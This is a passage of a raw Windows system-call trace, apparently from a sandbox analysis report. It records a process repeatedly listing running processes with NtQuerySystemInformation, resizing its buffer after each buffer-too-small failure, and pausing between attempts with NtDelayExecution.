BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.949] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.964] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.027] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.073] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.090] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.106] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.167] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.185] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.215] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.229] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.246] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.261] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 